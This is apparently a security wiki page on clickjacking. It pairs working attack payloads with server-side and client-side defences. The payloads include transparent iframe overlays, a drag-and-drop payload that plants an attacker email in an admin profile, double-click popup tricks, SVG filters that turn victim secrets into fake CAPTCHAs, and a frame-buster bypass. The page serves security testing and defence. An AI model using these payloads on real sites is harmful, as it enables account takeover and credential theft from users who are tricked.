Clickjacking


What is Clickjacking

In a clickjacking attack, a user is tricked into clicking an element on a web page that is either invisible or disguised as a different element. This manipulation can lead to unintended consequences for the user, such as downloading malware, being redirected to malicious sites, handing over credentials or sensitive information, transferring money, or buying products online.

Prepopulate forms trick

Sometimes it is possible to fill the values of form fields using GET parameters while loading a page. An attacker may abuse this behaviour to fill a form with arbitrary data and deliver the clickjacking payload so that the user presses the Submit button.

Populate form with Drag&Drop

If you need the user to fill a form but you don't want to ask them directly to type some specific information (like an email or a specific password you know), you can just ask them to Drag&Drop something that will write your controlled data, as shown in this example.

Basic Payload

<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:470px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>

Multistep Payload

<style>
iframe {
position:relative;
width: 500px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:330px;
left:60px;
z-index: 1;
}
.secondClick {
left:210px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>

Drag&Drop + Click payload

<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3" src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>

XSS + Clickjacking

If you have identified an XSS attack that requires a user to click on some element to trigger the XSS, and the page is vulnerable to clickjacking, you could abuse it to trick the user into clicking the button/link.
Example:
You have found a self XSS in some private details of the account (details that only you can set and read). The page with the form to set these details is vulnerable to Clickjacking, and you can prepopulate the form with GET parameters.
An attacker could prepare a Clickjacking attack against that page, prepopulating the form with the XSS payload and tricking the user into submitting the form. So, when the form is submitted and the values are modified, the user will execute the XSS.

DoubleClickjacking

First explained in this post, this technique asks the victim to double click a button of a custom page placed in a specific location, and uses the timing differences between the mousedown and onclick events to load the victim page during the double click, so the victim actually clicks a legitimate button in the victim page.

An example can be seen in this video: https://www.youtube.com/watch?v=4rGvRRMrD18

A code example can be found in this page.

Warning

This technique allows tricking the user into clicking in 1 place on the victim page, bypassing every protection against clickjacking. So the attacker needs to find sensitive actions that can be done with just 1 click, like OAuth prompts accepting permissions.

Some PoCs drop iframes entirely and keep a background popup positioned under the cursor. The attacker page tracks mousemove and uses a small popup (window.open) that is moved with moveTo() while it is still same-origin; once it has navigated, it is returned to the target origin so the next click lands on the real button. Because cross-origin moveTo() is blocked, the popup is briefly bounced to the attacker origin for repositioning, then location/history.back() returns it to the target. To make the target appear at the moment of the click, the attacker can reopen the popup with the same window name to bring it to the front without changing its URL.

<script>
let w;
onclick = () => {
if (!w) w = window.open('/shim', 'pj', 'width=360,height=240');
onmousemove = e => { try { w.moveTo(e.screenX, e.screenY); } catch {} };
// When ready, refocus the already-loaded popup
window.open('', 'pj');
};
</script>

SVG Filters / Cross-Origin Iframe UI Redressing

Modern Chromium/WebKit/Gecko builds allow CSS filter:url(#id) to be applied to cross-origin iframes. The rasterized pixels of the iframe are exposed to the SVG filter graph as SourceGraphic, so primitives such as feDisplacementMap, feBlend, feComposite, feColorMatrix, feTile, feMorphology, etc. can arbitrarily transform the victim UI before the user sees it, even though the attacker never touches the DOM. A simple Liquid-Glass style filter looks like:

<iframe src="https://victim.example" style="filter:url(#displacementFilter4)"></iframe>
  • Key primitives: feImage loads attacker bitmaps (e.g., overlays, displacement maps); feFlood builds constant-color mattes; feOffset/feGaussianBlur refine highlights; feDisplacementMap refracts/warps text; feComposite operator="arithmetic" implements arbitrary per-channel math (r = k1*i1*i2 + k2*i1 + k3*i2 + k4), which is enough for contrast boosting, masking, and AND/OR operations; feTile crops and replicates pixel probes; feMorphology grows/shrinks strokes; feColorMatrix moves luma into alpha to build precise masks.

Turning secrets into CAPTCHA-style prompts

If a frameable endpoint renders secrets (tokens, reset codes, API keys), an attacker can distort them so they look like a CAPTCHA and force manual transcription:

<svg width="0" height="0">
<filter id="captchaFilter">
<feTurbulence type="turbulence" baseFrequency="0.03" numOctaves="4" result="noise" />
<feDisplacementMap in="SourceGraphic" in2="noise" scale="6" xChannelSelector="R" yChannelSelector="G" />
</filter>
</svg>
<iframe src="https://victim" style="filter:url(#captchaFilter)"></iframe>
<input pattern="^6c79 ?7261 ?706f ?6e79$" required>

The distorted pixels fool the user into “solving” the captcha inside the attacker-controlled <input> whose pattern enforces the real victim secret.

Re-skinning the victim's input context

Filters can effectively erase placeholder/validation text while preserving the user's keystrokes. One example workflow:

  1. feComposite operator="arithmetic" k2≈4 boosts brightness until gray helper text clips to white.
  2. feTile crops the working region to the <input> box.
  3. feMorphology operator="erode" thickens the dark glyphs typed by the victim and preserves them via result="thick".
  4. feFlood creates a white plate, feBlend mode="difference" against thick, and a second feComposite k2≈100 turn it into a hard luma matte.
  5. feColorMatrix moves that luma into alpha, and feComposite in="SourceGraphic" operator="in" keeps only the glyphs typed by the user.
  6. Another feBlend in2="white" with a narrow crop yields a clean text box, then the attacker overlays its own HTML labels (e.g., "Enter your email") while the hidden iframe still enforces the victim's original password policy.

Safari chokes on feTile; the same effect can be built with spatial mattes made from feFlood + feColorMatrix + feComposite for WebKit-only payloads.

Pixel probing, logic and state machines

By cropping a 2–4 px region with feTile and tiling it to 100% of the viewport, the attacker turns a chosen colour into a full-frame texture that can be thresholded into a boolean mask:

<filter id="pixelProbe">
<feTile x="313" y="141" width="4" height="4" />
<feTile x="0" y="0" width="100%" height="100%" result="probe" />
<feComposite in="probe" operator="arithmetic" k2="120" k4="-1" />
<feColorMatrix type="matrix" values="0 0 0 0 0  0 0 0 0 0  0 0 0 0 0  0 0 1 0 0" result="mask" />
<feGaussianBlur in="SourceGraphic" stdDeviation="2" />
<feComposite operator="in" in2="mask" />
<feBlend in2="SourceGraphic" />
</filter>

For any colour, a feFlood reference (e.g., #0B57D0) combined with feBlend mode="difference" and another arithmetic composite (k2≈100, k4 as tolerance) produces white only when the probed pixel matches the target colour. Feeding these masks into feComposite with tweaked k1..k4 yields logic gates: AND with k1=1, OR with k2=k3=1, XOR via feBlend mode="difference", NOT by blending against white. Chaining gates builds a full adder inside the filter graph, showing that the pipeline is functionally complete.

Attackers can therefore read UI state without JavaScript. Example booleans from a modal workflow:

  • D (dialog visible): probe a dimmed corner and compare against white.
  • L (dialog loaded): probe the coordinate where a button appears once it is ready.
  • C (checkbox checked): compare the checkbox pixel against the active blue #0B57D0.
  • R (red success/failure banner): use feMorphology and red thresholds inside the banner box.

Each detected state gates a different overlay bitmap loaded via feImage xlink:href="data:...". Masking those bitmaps with D, L, C, R ensures the overlays line up with the real dialog and walks the victim through multi-step workflows (password recovery, consent, confirmation of destructive actions) without ever touching the DOM.

Sandboxed iframe Basic Auth dialog (no allow-popups)

A sandboxed iframe without allow-popups can still surface a browser-controlled HTTP Basic Authentication modal when a load returns 401 with WWW-Authenticate. The dialog is spawned by the browser's networking/auth layer (not a JS alert/prompt/confirm), so the popup restrictions inside the sandbox do not block it. If you can script the iframe (e.g., sandbox="allow-scripts") you can point it at any endpoint that issues a Basic Auth challenge:

<iframe id="basic" sandbox="allow-scripts"></iframe>
<script>
basic.src = "https://httpbin.org/basic-auth/user/pass"
</script>

As soon as the response arrives, the browser prompts the user for credentials even though popups are blocked. Framing a trusted origin with this trick enables UI redress/phishing: unexpected modals inside a "sandboxed" widget can confuse the user or trigger password managers into offering saved credentials.

Browser extensions: DOM-based autofill clickjacking

Besides iframing victim pages, an attacker can target browser-extension UI elements injected into the page. Password managers render autofill dropdowns next to focused inputs; by focusing an attacker-controlled field and hiding/overlaying the extension's dropdown (opacity/overlay/top-layer tricks), a forced user click can select a saved item and fill sensitive data into attacker-driven inputs. This variant needs no iframe and works entirely through DOM/CSS manipulation.

Real-world example: Dashlane disclosed a passkey dialog clickjacking issue (Aug 2025) where XSS on the relying-party domain allowed an attacker to place HTML over the extension's passkey dialog. A click on the attacker's element would proceed with a legitimate passkey login (the passkey itself was not exfiltrated), effectively turning UI redress into account access if the RP was already exposed to script injection.

Clickjacking Mitigation Strategies

Client-side defenses

Scripts executed on the client side can take measures to prevent Clickjacking:

  • Ensuring the application window is the main or top window.
  • Making all frames visible.
  • Preventing clicks on invisible frames.
  • Detecting and alerting users to potential Clickjacking attempts.

However, these frame-busting scripts can be bypassed:

  • Browsers' Security Settings: Some browsers may block these scripts based on their security settings or lack of JavaScript support.
  • HTML5 iframe sandbox Attribute: An attacker can neutralize frame-buster scripts by setting the sandbox attribute with the allow-forms or allow-scripts values without allow-top-navigation. This prevents the iframe from verifying whether it is the top window, e.g.,
<iframe
id="victim_website"
src="https://victim-website.com"
sandbox="allow-forms allow-scripts"></iframe>

The allow-forms and allow-scripts values enable actions within the iframe while disabling top-level navigation. To ensure the intended functionality of the targeted site, additional permissions like allow-same-origin and allow-modals might be necessary, depending on the attack type. Browser console messages can guide which permissions to allow.

Server-side defenses

X-Frame-Options

The X-Frame-Options HTTP response header informs browsers about the legitimacy of rendering a page in a <frame> or <iframe>, helping to prevent Clickjacking:

  • X-Frame-Options: deny - No domain can frame the content.
  • X-Frame-Options: sameorigin - Only the current site can frame the content.
  • X-Frame-Options: allow-from https://trusted.com - Only the specified URI can frame the page.
  • Note the limitations: if the browser doesn’t support this directive, it might not work. Some browsers prefer the CSP frame-ancestors directive.

Content Security Policy (CSP) frame-ancestors directive

The frame-ancestors directive in CSP is the recommended method for Clickjacking protection:

  • frame-ancestors 'none' - Equivalent to X-Frame-Options: deny.
  • frame-ancestors 'self' - Equivalent to X-Frame-Options: sameorigin.
  • frame-ancestors trusted.com - Equivalent to X-Frame-Options: allow-from.

For instance, the following CSP only allows framing from the same domain:

Content-Security-Policy: frame-ancestors 'self';

Further details and complex examples can be found in the frame-ancestors CSP documentation and Mozilla’s CSP frame-ancestors documentation.

Content Security Policy (CSP) with child-src and frame-src

Content Security Policy (CSP) is a security measure that helps prevent Clickjacking and other code-injection attacks by specifying which sources the browser should allow to load content from.

frame-src Directive

  • Defines valid sources for frames.
  • More specific than the default-src directive.

Content-Security-Policy: frame-src 'self' https://trusted-website.com;

This policy allows frames from the same origin (self) and https://trusted-website.com.

child-src Directive

  • Introduced in CSP level 2 to set valid sources for web workers and frames.
  • Acts as a fallback for frame-src and worker-src.

Content-Security-Policy: child-src 'self' https://trusted-website.com;

This policy allows frames and workers from the same origin (self) and https://trusted-website.com.

Usage Notes:

  • Deprecation: child-src is being phased out in favour of frame-src and worker-src.
  • Fallback Behaviour: If frame-src is absent, child-src is used as a fallback for frames. If both are absent, default-src is used.
  • Strict Source Definition: Include only trusted sources in the directives to prevent exploitation.
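The precedence rules described above (frame-ancestors overriding X-Frame-Options, and the frame-src → child-src → default-src fallback chain) are easy to get wrong when auditing a site by hand. The following Node helper is an added example, not code from the original page; the header values in the comments are constructed samples, and it assumes origins without explicit ports.

```javascript
// Split a CSP header into a map of directive -> source list.
function parseCsp(csp) {
  const directives = {};
  for (const part of csp.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name) directives[name.toLowerCase()] = sources;
  }
  return directives;
}

// Match one frame-ancestors source expression ('none', 'self', '*', or a host
// source with optional scheme and leading wildcard) against the framing origin.
function sourceMatches(source, framerOrigin, pageOrigin) {
  const s = source.replace(/^'|'$/g, '').toLowerCase();
  if (s === 'none') return false;
  if (s === 'self') return framerOrigin === pageOrigin;
  if (s === '*') return true;
  const framer = new URL(framerOrigin);
  const [scheme, host] = s.includes('://') ? s.split('://') : [null, s];
  if (scheme && scheme + ':' !== framer.protocol) return false;
  if (host.startsWith('*.')) return framer.hostname.endsWith(host.slice(1));
  return framer.hostname === host;
}

// May framerOrigin embed the page served at pageOrigin with these headers?
// Browsers that understand frame-ancestors ignore X-Frame-Options when both are present.
function mayBeFramedBy(headers, pageOrigin, framerOrigin) {
  const h = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));
  const csp = h['content-security-policy'] ? parseCsp(h['content-security-policy']) : {};
  if (csp['frame-ancestors']) {
    return csp['frame-ancestors'].some(src => sourceMatches(src, framerOrigin, pageOrigin));
  }
  const xfo = (h['x-frame-options'] || '').trim().toLowerCase();
  if (xfo === 'deny') return false;
  if (xfo === 'sameorigin') return framerOrigin === pageOrigin;
  // ALLOW-FROM (or any other value) is not understood by current browsers, which
  // then ignore the header entirely, so the page is reported as frameable.
  return true;
}

// Which directive governs what this page may frame: frame-src, then child-src,
// then default-src; with none of them set, any source is allowed.
function effectiveFrameSources(cspHeader) {
  const csp = parseCsp(cspHeader);
  for (const d of ['frame-src', 'child-src', 'default-src']) {
    if (csp[d]) return { directive: d, sources: csp[d] };
  }
  return { directive: null, sources: ['*'] };
}
```

A response carrying only `X-Frame-Options: ALLOW-FROM ...` is reported as frameable, which is the practical outcome in current browsers and the reason the page recommends frame-ancestors instead.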

JavaScript Frame-Breaking Scripts

Though not entirely foolproof, JavaScript-based frame-busting scripts can be used to prevent a web page from being framed. Example:

if (top !== self) {
top.location = self.location
}
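The script above fails open: if a sandboxed iframe blocks the top-level navigation or scripts are disabled, the page stays fully usable inside the attacker's frame. The variant below is an added example, not from the original page; it assumes the page's `<head>` contains `<style id="antiClickjack">body { display: none !important; }</style>` before the script, so the page is blank until the script proves it is the top window, and takes `win`/`doc` as parameters only so it can be exercised outside a browser.

```javascript
// Hide-by-default frame guard. Call as frameGuard(window, document) in the browser,
// right after the <style id="antiClickjack"> element in <head>.
function frameGuard(win, doc) {
  const style = doc.getElementById('antiClickjack');
  if (win.self === win.top) {
    // Proven to be the top window: remove the hiding style and show the page.
    if (style && style.parentNode) style.parentNode.removeChild(style);
    return 'revealed';
  }
  try {
    // Framed: attempt the classic frame-bust.
    win.top.location = win.self.location;
  } catch (e) {
    // A sandboxed iframe without allow-top-navigation blocks this (some browsers
    // throw); the body simply stays hidden, which is the safe outcome.
  }
  return 'hidden';
}
```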

Employing Anti-CSRF Tokens

  • Token Validation: Use anti-CSRF tokens in web applications to ensure that state-changing requests are made intentionally by the user and not through a Clickjacked page.
